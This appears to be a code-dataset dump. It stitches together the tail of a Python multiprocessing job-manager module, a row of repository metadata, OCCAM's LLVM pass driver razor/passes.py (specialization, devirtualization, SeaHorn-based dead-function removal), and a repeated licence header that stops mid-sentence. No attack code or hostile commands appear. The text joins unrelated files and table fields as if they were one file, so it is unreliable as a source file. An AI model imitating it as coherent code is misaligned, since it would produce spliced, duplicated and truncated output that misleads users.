# used to save all PID of workers created
# NOTE(review): Manager() is created at import time, which spawns a manager
# server process as an import side effect — confirm intended.
m = Manager()
_current_work_pids = m.list()
class TimerResponse(Enum):
    """What the watchdog timer does when the search timeout fires
    (dispatched in DistributedJobManager._setup_timeout_timer)."""
    KILL_WORKERS = 0      # -> _kill_me(): terminate the pool and exit the process
    STOP_WORKER_JOBS = 1  # -> _stop_worker_jobs(): just clear the pending-job queue
import logging.handlers  # fix: `import logging` alone does not load the
                         # handlers submodule, so referencing
                         # logging.handlers.QueueHandler below could raise
                         # AttributeError at import time.
class WorkerQueueHandler(logging.handlers.QueueHandler):
    '''
    QueueHandler that prefixes every record's message with the name of the
    worker process that emitted it, so interleaved worker logs stay readable
    when they are drained by the main process's logger thread.
    '''
    def __init__(self, queue):
        super().__init__(queue)
    def prepare(self, record):
        """Tag record.msg with the current process name (padded to 17
        chars), then let QueueHandler.prepare format and strip the record
        for cross-process transport."""
        if record is not None and record.msg is not None:
            record.msg = f'{current_process().name:17} > ' + str(record.msg)
        return super().prepare(record)
    # def emit(self, record):
    #     print('emit:', record)
    #     return super().emit(record)
    # def enqueue(self, record):
    #     print('enqueue:', record)
    #     return super().enqueue(record)
class QueueWrapper:
    """Thin proxy around a managed queue that, when the module logger is at
    DEBUG level, warns whenever a message pickling to more than ~10 MB is
    enqueued (large payloads are expensive to ship between processes)."""

    def __init__(self, name, queue):
        self.name = name    # label used in the large-message warning
        self.queue = queue  # underlying queue object being wrapped

    def put(self, item, block=True, timeout=None):
        if _logger.getEffectiveLevel() <= 10:  # logging.DEBUG == 10
            pickled_size = len(pickle.dumps(item))
            if pickled_size > 10**7:
                _logger.warning('Large message: %s queue: %d mb',
                                self.name, pickled_size / 10**6)
        self.queue.put(item, block=block, timeout=timeout)

    def put_nowait(self, item):
        return self.queue.put(item, False)

    def get(self, block=True, timeout=None):
        return self.queue.get(block=block, timeout=timeout)

    def get_nowaite(self):
        # NOTE(review): the name keeps the original misspelling ("nowaite")
        # because external callers may rely on it.
        return self.queue.get(False)

    def qsize(self):
        return self.queue.qsize()

    def empty(self):
        return self.queue.empty()

    def full(self):
        return self.queue.full()

    def task_done(self):
        self.queue.task_done()

    def join(self):
        self.queue.join()
class DistributedJobManager:
    """Multiprocessing job manager: a pool of long-lived worker processes
    pulls (object, method, kwargs) bundles from arguments_queue, runs them,
    and pushes (kwargs, result) pairs onto result_queue.  A watchdog Timer
    enforces timeout_sec according to the TimerResponse policy, and worker
    log records are funneled through log_queue to a listener thread."""
    def __init__(self, proc_num: int = 4, timer_response=TimerResponse.STOP_WORKER_JOBS):
        self.start_time = time.perf_counter()
        self.proc_num = proc_num
        self.timer_response = timer_response
        # -1 means "no timeout configured yet"; set via the timeout_sec property
        self._timeout_sec = -1
        self.manager = Manager()
        # self.manager.start()
        self.arguments_queue: Queue = QueueWrapper('arguments', self.manager.Queue())
        self.result_queue: Queue = QueueWrapper('result', self.manager.Queue())
        self.log_queue: Queue = QueueWrapper('log', self.manager.Queue())
        self.argument_lock = self.manager.Lock()
        self.result_lock = self.manager.Lock()
        # initialize
        self.job_pool: Pool = None
        self.timer: Timer = None
        # status counter
        self.ongoing_jobs: int = 0
        # start the workers
        self._start_workers(DistributedJobManager._posted_job_wrapper)
    @property
    def timeout_sec(self):
        # Overall search timeout in seconds (-1 = not set).
        return self._timeout_sec
    @timeout_sec.setter
    def timeout_sec(self, value: int):
        # Setting the timeout also (re)arms the watchdog timer.
        self._timeout_sec = value
        self._setup_timeout_timer()
    def _start_workers(self, target_method: typing.Callable):
        """Start the log-listener thread and a closed pool of proc_num
        worker processes, each running _internal_worker_process forever."""
        # Start logging listener
        lp = threading.Thread(target=DistributedJobManager._logger_thread, args=(self.log_queue,))
        lp.start()
        self.job_pool = Pool(processes=self.proc_num)
        self.job_pool.map_async(
            func=DistributedJobManager._internal_worker_process,
            iterable=[
                (self.arguments_queue, self.result_queue, target_method,
                 self.log_queue, DistributedJobManager._log_configurer)
                for a in range(self.proc_num)]
        )
        self.job_pool.close()  # prevents any additional worker to be added to the pool
    @staticmethod
    def _posted_job_wrapper(target_obj: typing.Any, target_method: str,
                            kwargs: typing.Dict = {}) -> typing.Any:
        """Resolve target_method by name on target_obj and call it with
        kwargs; this is the `target` each worker runs per job.
        NOTE(review): mutable default dict — harmless here because kwargs
        is never mutated, only unpacked."""
        # print("[INFO] I am job ")
        method_to_call = getattr(target_obj, target_method)
        # time.sleep(input)
        result = method_to_call(**kwargs)
        return result
    @staticmethod
    def _log_configurer(log_queue: Queue):
        '''
        Configure logging handlers for a worker
        '''
        h = WorkerQueueHandler(log_queue)
        root = logging.getLogger()
        root.addHandler(h)
        # TODO: Now, sending all messages. Should set level based on logging level.
        # root.setLevel(logging.DEBUG)
    @staticmethod
    def _logger_thread(q: Queue):
        '''
        Thread on main process to wait for logging events
        '''
        # A None record is the sentinel that stops the listener
        # (sent by kill_job_manager).
        while True:
            record = q.get()
            # print('log record:', record)
            if record is None:
                break
            logger = logging.getLogger(record.name)
            logger.handle(record)
    @staticmethod
    def _internal_worker_process(args: typing.Tuple[Queue, Queue, Queue, typing.Callable]) -> None:
        """
        The worker process iteratively checks the arguments_queue. It runs the target method with
        the arguments from top of arguments_queue. The worker finally pushes the results to the
        results queue for main process to read from it.
        Args:
            args: typing.Tuple[Queue, Queue, typing.Callable]
        """
        arguments_queue: Queue = args[0]
        result_queue: Queue = args[1]
        target: typing.Callable = args[2]
        log_queue: Queue = args[3]
        log_configurer: typing.Callable = args[4]
        # Configure logging
        log_configurer(log_queue)
        # _logger.debug("worker process started {}".format(current_process().name))
        # print(f"[INFO] {current_process().name} > worker process started")
        _logger.info("worker process started")
        _current_work_pids.append(os.getpid())
        counter: int = 0
        error_count: int = 0
        # Loop forever; give up after more than 3 unexpected errors.
        while True:
            if error_count > 3:
                break
            try:
                # wait until a new job is available
                # print(f"[INFO] {current_process().name} > waiting on new jobs")
                _logger.info("waiting on new jobs")
                kwargs = arguments_queue.get(block=True)
                _logger.info("copying")
                # shallow copy kept so a (kwargs, None) pair can still be
                # pushed if the real result fails to pickle below
                kwargs_copy = copy.copy(kwargs)
                # execute the job
                try:
                    # TODO add timelimit to single work in the worker
                    # print(f"[INFO] {current_process().name} > executing job")
                    result = target(**kwargs)
                    # assert hasattr(result['fitted_pipeline'], 'runtime'), \
                    #     '[DJM] Eval does not have runtime'
                except:
                    _logger.exception(
                        f'Target evaluation failed {hash(str(kwargs))}', exc_info=True)
                    # print(f'[INFO] {current_process().name} > Target evaluation failed {hash(str(kwargs))}')
                    # traceback.print_exc()
                    # _logger.error(traceback.format_exc())
                    result = None
                # push the results
                if result is not None:
                    result_simplified = result.copy()
                    if "ensemble_tunning_result" in result:
                        result_simplified.pop("ensemble_tunning_result")
                _logger.info(f"Pushing Results: {result['id'] if result and 'id' in result else 'NONE'}")
                _logger.debug(f"Pushing Results={result} kwargs={kwargs}")
                try:
                    result_queue.put((kwargs, result))
                except BrokenPipeError:
                    _logger.exception(f"Result queue put failed. Broken Pipe.")
                    exit(1)
                except:
                    # traceback.print_exc()
                    _logger.exception(f"Result queue put failed.", exc_info=True)
                    _logger.info(f"Result queue is full: {result_queue.full()}")
                    try:
                        _logger.info("Pushing result None. Maybe Result failed to pickle.")
                        result_queue.put((kwargs_copy, None))
                    except:
                        # traceback.print_exc()
                        # _logger.exception(f"{current_process().name} > {traceback.format_exc()}")
                        # print(f"[INFO] {current_process().name} > cannot even push None")
                        _logger.exception(f"Result queue put failed with empty Result.", exc_info=True)
                        _logger.info("Cannot even push None")
                        exit(1)
                    # exit(1)
                counter += 1
                # print(f"[INFO] {current_process().name} > is Idle, done {counter} jobs")
                _logger.info(f"is Idle, done {counter} jobs")
            except BrokenPipeError:
                error_count += 1
                print(f"{current_process().name:17} > Broken Pipe. Error count={error_count}")
                _logger.exception(f"Broken Pipe. Error count={error_count}")
            except Exception:
                error_count += 1
                print(f"{current_process().name:17} > Unexpected Exception. Error count={error_count}")
                _logger.exception(f"Unexpected Exception. Error count={error_count}", exc_info=True)
        print(f"{current_process().name:17} > Worker EXITING")
        _logger.warning('Worker EXITING')
    def push_job(self, kwargs_bundle: typing.Dict = {}) -> int:
        """
        Enqueue one job bundle for the workers and return hash(str(bundle)).
        NOTE(review): mutable default dict — harmless here because the
        bundle is never mutated, only validated and enqueued.
        Args:
            kwargs_bundle: {'target_obj': ..., 'target_method': ...,
                            'kwargs': {...}}
        Returns: int
            hash of the input argument
        """
        hint_message = "kwargs must be a dict with format: " \
                       "{\'target_obj\': ... , " \
                       "\'target_method\': ..., " \
                       "\'kwargs\': {[arg_name]: ...,}}"
        assert isinstance(kwargs_bundle, dict), hint_message
        assert all(
            l in kwargs_bundle for l in ['target_obj', 'target_method', 'kwargs']), hint_message
        assert isinstance(kwargs_bundle['kwargs'], dict), hint_message
        with self.argument_lock:
            self.ongoing_jobs += 1
            self.arguments_queue.put(kwargs_bundle)
        # self.result_queue_size = None
        return hash(str(kwargs_bundle))
    def pop_job(self, block: bool = False, timeout=None) -> typing.Tuple[typing.Dict, typing.Any]:
        """
        Pops the results from results queue
        Args:
            block: bool
                Is the pop blocking or non-blocking
        Returns:
            (kwargs, results) pair as pushed by a worker
        """
        _logger.info(f"# ongoing_jobs {self.ongoing_jobs}")
        print(f"# ongoing_jobs {self.ongoing_jobs}")
        with self.result_lock:
            (kwargs, results) = self.result_queue.get(block=block, timeout=timeout)
            self.ongoing_jobs -= 1
            print(f"[PID] pid:{os.getpid()}")
            # _logger.info(f"[INFO] end of pop # ongoing_jobs {self.ongoing_jobs}")
            return (kwargs, results)
        # self.result_queue_size = self.result_queue.qsize()
        # #!!!! error happened here
        # if self.result_queue_size > 0:
        #     _logger.debug("result_queue size is {}".format(str(self.result_queue.qsize())))
        #     (kwargs, results) = self.result_queue.get(block=block)
        #     self.ongoing_jobs -= 1
        #     print(f"[PID] pid:{os.getpid()}")
        #     self.Qlock.release()
        #     # _logger.info(f"[INFO] end of pop # ongoing_jobs {self.ongoing_jobs}")
        #     return (kwargs, results)
        # else:
        #     self.ongoing_jobs -= 1
        #     print(f"[PID] pid:{os.getpid()}")
        #     self.Qlock.release()
        #     return (None, None)
    def any_pending_job(self):
        # True while at least one bundle is still waiting for a worker.
        return not self.arguments_queue.empty()
    def is_idle(self):
        # Idle = nothing queued in either direction and no job in flight.
        return self.are_queues_empty() and self.are_workers_idle()
    def are_workers_idle(self):
        print(f"ongoing Jobs:{self.ongoing_jobs}")
        _logger.info(f"ongoing Jobs:{self.ongoing_jobs}")
        return self.ongoing_jobs == 0
    def are_queues_empty(self) -> bool:
        # _logger.info(f"arguments_queue:{len(self.arguments_queue)}, "
        #              f"result_queue:{len(self.result_queue)}")
        _logger.debug(f"are_queues_empty: {self.arguments_queue.empty()} and "
                      f"{self.result_queue.empty()}")
        return self.arguments_queue.empty() and self.result_queue.empty()
    def check_timeout(self):
        """
        Checks the timeout is reached.
        Returns:
            None
        Raises:
            TimeoutError: if the timeout is reached
        """
        elapsed_sec = ceil(time.perf_counter() - self.start_time)
        if elapsed_sec > self._timeout_sec:
            raise TimeoutError("Timeout reached: {}/{}".format(elapsed_sec, self.timeout_sec))
    def reset(self):
        '''
        Cancel timer and clear the job queue.
        '''
        self._timeout_sec = -1
        if self.timer:
            self.timer.cancel()
        self._clear_jobs()
    def kill_job_manager(self):
        """
        Safely kills the jobManager and all of its components
        Returns:
            None
        """
        _logger.warning('===DO YOU REALLY WANT TO KILL THE JOB MANAGER===')
        # Send sentinel to stop logging listener
        self.log_queue.put(None)
        _logger.debug("self.job_pool.terminate()")
        self.job_pool.terminate()
        _logger.debug("self.manager.shutdown()")
        self.manager.shutdown()
        # _logger.debug("kill_child_processes()")
        # DistributedJobManager.kill_child_processes()
        _logger.debug("self.kill_timer()")
        self.kill_timer()
    def kill_timer(self):
        # Cancel the watchdog timer if one was armed.
        if self.timer:
            _logger.warning(f"timer killed")
            self.timer.cancel()
    def _setup_timeout_timer(self):
        """(Re)arm the watchdog: on expiry either kill everything or just
        drop pending jobs, depending on self.timer_response."""
        self.start_time = time.perf_counter()
        if self.timer_response == TimerResponse.KILL_WORKERS:
            self.timer = Timer(self._timeout_sec, self._kill_me)
        else:
            self.timer = Timer(self._timeout_sec, self._stop_worker_jobs)
        self.timer.start()
        _logger.warning(f"timer started: {self._timeout_sec/60} min")
    def _stop_worker_jobs(self):
        _logger.warning("search TIMEOUT reached! Stopping worker jobs. Actually just clearing the queue.")
        self._clear_jobs()
    def _clear_jobs(self):
        # Drain arguments_queue and zero the in-flight counter.
        with self.argument_lock:
            _logger.info(f"Clearing {self.ongoing_jobs} jobs from queue")
            self.ongoing_jobs = 0
            while not self.arguments_queue.empty():
                self.arguments_queue.get()
    def _kill_me(self):
        # Timer callback for TimerResponse.KILL_WORKERS: tear everything
        # down and hard-exit the process.
        _logger.warning("search TIMEOUT reached! Killing search Process")
        self.kill_job_manager()
        self.kill_timer()
        os._exit(0)
        # os.kill(os.getpid(), 9)
    @staticmethod
    def kill_child_processes():
        """Kill every child process of the current process (via psutil)."""
        process_id = os.getpid()
        parent = psutil.Process(process_id)
        for child in parent.children(recursive=True):  # or parent.children() for recursive=False
            child.kill()
| 4,684 | 9,567 | 391 |
4d0daa960362632a61b5cf757503f182df9a344c | 15,588 | py | Python | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | """
OCCAM
Copyright (c) 2011-2017, SRI International
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SRI International nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import os
import tempfile
import shutil
from . import config
from . import driver
from . import interface as inter
from . import stringbuffer
from . import pool
from . import utils
def interface(input_file, output_file, wrt):
    """ computing the interfaces.
    """
    flags = ['-Pinterface2', '-Pinterface2-output', output_file]
    flags.extend(driver.all_args('-Pinterface2-entry', wrt))
    return driver.previrt(input_file, '/dev/null', flags)
def specialize(input_file, output_file, rewrite_file, interfaces):
    """ inter module specialization.

    rewrite_file, when given, receives the generated rewrite rules;
    output_file of None discards the specialized module.
    """
    args = ['-Pspecialize']
    # FIX: idiomatic identity test ('x is not None' instead of 'not x is None').
    if rewrite_file is not None:
        args += ['-Pspecialize-output', rewrite_file]
    args += driver.all_args('-Pspecialize-input', interfaces)
    if output_file is None:
        output_file = '/dev/null'
    return driver.previrt(input_file, output_file, args)
def rewrite(input_file, output_file, rewrites, output=None):
    """ inter module rewriting
    """
    flags = ['-Prewrite']
    flags += driver.all_args('-Prewrite-input', rewrites)
    return driver.previrt_progress(input_file, output_file, flags, output)
def internalize(input_file, output_file, interfaces, whitelist):
    """ marks unused symbols as internal/hidden
    """
    flags = ['-Poccam'] + driver.all_args('-Poccam-input', interfaces)
    if whitelist is not None:
        # Symbols on the whitelist stay external.
        flags += ['-Pkeep-external', whitelist]
    return driver.previrt_progress(input_file, output_file, flags)
def strip(input_file, output_file):
    """ strips unused symbols
    """
    opt_flags = [input_file, '-o', output_file,
                 '-strip', '-globaldce', '-globalopt', '-strip-dead-prototypes']
    return driver.run('opt', opt_flags)
def devirt(input_file, output_file):
    """ resolve indirect function calls
    """
    args = ['-devirt-ta',
            # XXX: this one is not, in general, sound
            #'-calltarget-ignore-external',
            '-inline']
    retcode = driver.previrt_progress(input_file, output_file, args)
    if retcode != 0:
        return retcode
    # FIXME: previrt_progress returns 0 in cases where --devirt-ta crashes,
    # so double-check that the output file was actually produced.
    if not os.path.isfile(output_file):
        # some return code different from zero
        return 3
    return retcode
def profile(input_file, output_file):
    """ count number of instructions, functions, memory accesses, etc.
    """
    flags = ['-Pprofiler', '-profile-outfile={0}'.format(output_file)]
    return driver.previrt(input_file, '/dev/null', flags)
def peval(input_file, output_file, use_devirt, use_llpe, use_ipdse, log=None):
    """ intra module previrtualization

    Pipeline: optimize -> [devirt] -> [llpe] -> [ipdse] -> fixed-point loop
    of (optimize; -Ppeval) until -Ppeval makes no more progress.  On any
    stage failure the last good bitcode is copied to output_file and the
    failing return code is returned.
    """
    # delete=False: the files are handed to external 'opt' runs by name,
    # so they must be closed here and unlinked manually at the end.
    opt = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
    done = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
    tmp = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
    opt.close()
    done.close()
    tmp.close()
    #XXX: Optimize using standard llvm transformations before any other pass.
    #Otherwise, these passes will not be very effective.
    retcode = optimize(input_file, done.name)
    if retcode != 0:
        sys.stderr.write("ERROR: intra module optimization failed!\n")
        shutil.copy(input_file, output_file)
        return retcode
    else:
        sys.stderr.write("\tintra module optimization finished succesfully\n")
    # Invariant from here on: done.name holds the latest good bitcode.
    if use_devirt is not None:
        retcode = devirt(done.name, tmp.name)
        if retcode != 0:
            sys.stderr.write("ERROR: resolution of indirect calls failed!\n")
            shutil.copy(done.name, output_file)
            return retcode
        sys.stderr.write("\tresolved indirect calls finished succesfully\n")
        shutil.copy(tmp.name, done.name)
    if use_llpe is not None:
        # LLPE is loaded as out-of-tree opt plugins.
        llpe_libs = []
        for lib in config.get_llpelibs():
            llpe_libs.append('-load={0}'.format(lib))
        args = llpe_libs + ['-loop-simplify', '-lcssa', \
                            '-llpe', '-llpe-omit-checks', '-llpe-single-threaded', \
                            done.name, '-o=%s' % tmp.name]
        retcode = driver.run('opt', args)
        if retcode != 0:
            sys.stderr.write("ERROR: llpe failed!\n")
            shutil.copy(done.name, output_file)
            #FIXME: unlink files
            return retcode
        else:
            sys.stderr.write("\tllpe finished succesfully\n")
            shutil.copy(tmp.name, done.name)
    if use_ipdse is not None:
        ##lower global initializers to store's in main (improve precision of sccp)
        passes = ['-lower-gv-init']
        ##dead store elimination (improve precision of sccp)
        passes += ['-memory-ssa', '-Pmem-ssa-local-mod','-Pmem-ssa-split-fields',
                   '-mem2reg', '-ip-dse', '-strip-memory-ssa-inst']
        ##perform sccp
        passes += ['-Psccp']
        ##cleanup after sccp
        passes += ['-dce', '-globaldce']
        retcode = driver.previrt(done.name, tmp.name, passes)
        if retcode != 0:
            sys.stderr.write("ERROR: ipdse failed!\n")
            shutil.copy(done.name, output_file)
            #FIXME: unlink files
            return retcode
        else:
            sys.stderr.write("\tipdse finished succesfully\n")
            shutil.copy(tmp.name, done.name)
    # out[0] collects -Ppeval's textual output (list used as a mutable cell).
    out = ['']
    iteration = 0
    while True:
        iteration += 1
        # On the first iteration the module was already optimized above,
        # unless llpe/ipdse ran and may have created new opportunities.
        if iteration > 1 or \
           (use_llpe is not None or use_ipdse is not None):
            # optimize using standard llvm transformations
            retcode = optimize(done.name, opt.name)
            if retcode != 0:
                sys.stderr.write("ERROR: intra-module optimization failed!\n")
                break;
            else:
                sys.stderr.write("\tintra module optimization finished succesfully\n")
        else:
            shutil.copy(done.name, opt.name)
        # inlining using policies
        passes = ['-Ppeval']
        progress = driver.previrt_progress(opt.name, done.name, passes, output=out)
        sys.stderr.write("\tintra-module specialization finished\n")
        if progress:
            if log is not None:
                log.write(out[0])
        else:
            # No progress: opt.name is the fixed point.
            shutil.copy(opt.name, done.name)
            break
    shutil.copy(done.name, output_file)
    try:
        os.unlink(done.name)
        os.unlink(opt.name)
        os.unlink(tmp.name)
    except OSError:
        pass
    return retcode
def optimize(input_file, output_file):
    """ run opt -O3
    """
    return driver.run('opt', ['-disable-simplify-libcalls',
                              input_file, '-o', output_file, '-O3'])
def constrain_program_args(input_file, output_file, cnstrs, filename=None):
    """ constrain the program arguments.

    cnstrs is a pair (argc, argv); argv entries are written one per line,
    numbered from 0.  When filename is None a temporary constraints file
    is created and removed afterwards.
    """
    if filename is None:
        cnstr_file = tempfile.NamedTemporaryFile(delete=False)
        cnstr_file.close()
        cnstr_file = cnstr_file.name
    else:
        cnstr_file = filename
    # FIX: 'with' guarantees the file is closed even if a write fails
    # (the original leaked the handle on exception); enumerate replaces
    # the hand-maintained index counter.
    with open(cnstr_file, 'w') as f:
        (argc, argv) = cnstrs
        f.write('{0}\n'.format(argc))
        for index, x in enumerate(argv):
            f.write('{0} {1}\n'.format(index, x))
    args = ['-Pconstraints', '-Pconstraints-input', cnstr_file]
    driver.previrt(input_file, output_file, args)
    if filename is None:
        os.unlink(cnstr_file)
def specialize_program_args(input_file, output_file, args, filename=None, name=None):
    """ fix the program arguments.

    args is the list of concrete argv values, written one per line.  When
    filename is None a temporary file is created and removed afterwards.
    """
    if filename is None:
        arg_file = tempfile.NamedTemporaryFile(delete=False)
        arg_file.close()
        arg_file = arg_file.name
    else:
        arg_file = filename
    # FIX: 'with' closes the file even if a write fails (previously leaked).
    with open(arg_file, 'w') as f:
        for x in args:
            f.write(x + '\n')
    extra_args = []
    # FIX: idiomatic identity test ('is not None').
    if name is not None:
        extra_args = ['-Parguments-name', name]
    args = ['-Parguments', '-Parguments-input', arg_file] + extra_args
    driver.previrt(input_file, output_file, args)
    if filename is None:
        os.unlink(arg_file)
def deep(libs, ifaces):
    """ compute interfaces across modules.

    Seeds a joined interface from the given interface files, then keeps
    re-running the per-module `interface` pass over every library until the
    joined interface stops growing (a fixed point).  Returns the joined
    interface object.
    """
    tf = tempfile.NamedTemporaryFile(suffix='.iface', delete=False)
    tf.close()
    # Union of all input interfaces.
    iface = inter.parseInterface(ifaces[0])
    for i in ifaces[1:]:
        inter.joinInterfaces(iface, inter.parseInterface(i))
    inter.writeInterface(iface, tf.name)
    progress = True
    while progress:
        progress = False
        for l in libs:
            interface(l, tf.name, [tf.name])
            x = inter.parseInterface(tf.name)
            # NOTE(review): joinInterfaces presumably returns True when it
            # added new entries -- that is what drives the fixed point;
            # confirm in the interface module.
            progress = inter.joinInterfaces(iface, x) or progress
            inter.writeInterface(iface, tf.name)
    os.unlink(tf.name)
    return iface
def run_seahorn(sea_cmd, input_file, fname, is_loop_free, cpu, mem):
    """ running SeaHorn

    Tries to prove that function fname is unreachable.  On success the
    verifier call is replaced with unreachable, the module is re-optimized,
    and the new bitcode file name is returned; otherwise input_file is
    returned unchanged.
    """
    # FIX: check_status was referenced below but never defined in this copy
    # of the file (NameError at runtime); restore the helper that classifies
    # SeaHorn's output.
    def check_status(output_str):
        # 'unsat' must be tested before 'sat' ('sat' is a substring of 'unsat').
        if "unsat" in output_str:
            return True
        elif "sat" in output_str:
            return False
        else:
            return None
    # 1. Instrument the program with assertions
    sea_infile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
    sea_infile.close()
    args = ['--Padd-verifier-calls',
            '--Padd-verifier-call-in-function={0}'.format(fname)]
    driver.previrt(input_file, sea_infile.name, args)
    # 2. Run SeaHorn
    sea_args = ['--strip-extern',
                '--enable-indvar',
                '--enable-loop-idiom',
                '--symbolize-constant-loop-bounds',
                '--unfold-loops-for-dsa',
                '--simplify-pointer-loops',
                '--horn-sea-dsa-local-mod',
                '--horn-sea-dsa-split',
                '--dsa=sea-cs',
                '--cpu={0}'.format(cpu),
                '--mem={0}'.format(mem)]
    if is_loop_free:
        # the bound shouldn't affect proving unreachability of the
        # function but we need a global bound for all loops.
        sea_args = ['bpf', '--bmc=mono', '--bound=3'] + sea_args + \
                   ['--horn-bv-global-constraints=true',
                    '--horn-bv-singleton-aliases=true',
                    '--horn-bv-ignore-calloc=false',
                    '--horn-at-most-one-predecessor']
        sys.stderr.write('\tRunning SeaHorn with BMC engine on {0} ...\n'.format(fname))
    else:
        sea_args = ['pf'] + sea_args + \
                   ['--horn-global-constraints=true',
                    '--horn-singleton-aliases=true',
                    '--horn-ignore-calloc=false',
                    '--crab', '--crab-dom=int']
        sys.stderr.write('\tRunning SeaHorn with Spacer+AI engine on {0} ...\n'.format(fname))
    sea_args = sea_args + [sea_infile.name]
    sb = stringbuffer.StringBuffer()
    retcode = driver.run(sea_cmd, sea_args, sb, False)
    status = check_status(str(sb))
    if retcode == 0 and status:
        # 3. If SeaHorn proved unreachability of the function then we
        # add assume(false) at the entry of that function.
        sys.stderr.write('SeaHorn proved unreachability of {0}!\n'.format(fname))
        sea_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
        sea_outfile.close()
        args = ['--Preplace-verifier-calls-with-unreachable']
        driver.previrt_progress(sea_infile.name, sea_outfile.name, args)
        # 4. And, we run the optimizer to remove that function
        sea_opt_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
        sea_opt_outfile.close()
        optimize(sea_outfile.name, sea_opt_outfile.name)
        return sea_opt_outfile.name
    else:
        sys.stderr.write('\tSeaHorn could not prove unreachability of {0}.\n'.format(fname))
        # FIX: '<>' is Python-2-only syntax; '!=' behaves identically and
        # also parses under Python 3.
        if retcode != 0:
            sys.stderr.write('\t\tPossibly timeout or memory limits reached\n')
        elif not status:
            sys.stderr.write('\t\tSeaHorn got a counterexample\n')
        return input_file
def precise_dce(input_file, ropfile, output_file):
    """ use SeaHorn model-checker to remove dead functions

    Ranks functions by ROP-gadget benefit vs. loop cost, asks SeaHorn to
    prove the profitable ones unreachable, and copies the final bitcode to
    output_file.  Returns True iff at least one function was removed.
    """
    sea_cmd = utils.get_seahorn()
    if sea_cmd is None:
        sys.stderr.write('SeaHorn not found. Aborting precise dce ...')
        shutil.copy(input_file, output_file)
        return False
    cost_benefit_out = tempfile.NamedTemporaryFile(delete=False)
    args = ['--Pcost-benefit-cg']
    args += ['--Pbenefits-filename={0}'.format(ropfile)]
    args += ['--Pcost-benefit-output={0}'.format(cost_benefit_out.name)]
    driver.previrt(input_file, '/dev/null', args)
    ####
    ## TODO: make these parameters user-definable:
    ####
    benefit_threshold = 20   ## number of ROP gadgets
    cost_threshold = 3       ## number of loops
    timeout = 120            ## SeaHorn timeout in seconds
    memlimit = 4096          ## SeaHorn memory limit in MB
    seahorn_queries = []
    # NOTE(review): this iterates the still-open NamedTemporaryFile after an
    # external process wrote to the same path; the handle's position is
    # still 0 so the fresh contents are read -- POSIX-only behaviour,
    # confirm if Windows support is ever needed.
    for line in cost_benefit_out:
        tokens = line.split()
        # Expected format of each line: FUNCTION BENEFIT COST
        # where FUNCTION is a string and BENEFIT/COST are integers.
        if len(tokens) < 3:
            sys.stderr.write('ERROR: unexpected format of {0}\n'.format(cost_benefit_out.name))
            return False
        fname = tokens[0]
        fbenefit = int(tokens[1])
        fcost = int(tokens[2])
        # fcost == 0 means the function is loop free, which enables BMC.
        if fbenefit >= benefit_threshold and fcost <= cost_threshold:
            seahorn_queries.append((fname, fcost == 0))
    cost_benefit_out.close()
    if not seahorn_queries:
        # FIX: 'print "..."' is Python-2-only; a single-argument print(...)
        # behaves identically on Python 2 and 3.
        print("No queries for SeaHorn ...")
    #####
    ## TODO: run SeaHorn instances in parallel
    #####
    change = False
    curfile = input_file
    for (fname, is_loop_free) in seahorn_queries:
        # Never try to remove the entry point or verifier-injected helpers.
        if fname == 'main' or \
           fname.startswith('devirt') or \
           fname.startswith('seahorn'):
            continue
        nextfile = run_seahorn(sea_cmd, curfile, fname, is_loop_free, timeout, memlimit)
        # run_seahorn returns a new file name only when it removed fname.
        # FIX: '<>' replaced by '!='.
        change = change or (curfile != nextfile)
        curfile = nextfile
    shutil.copy(curfile, output_file)
    return change
| 36.420561 | 96 | 0.624391 | """
OCCAM
Copyright (c) 2011-2017, SRI International
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SRI International nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
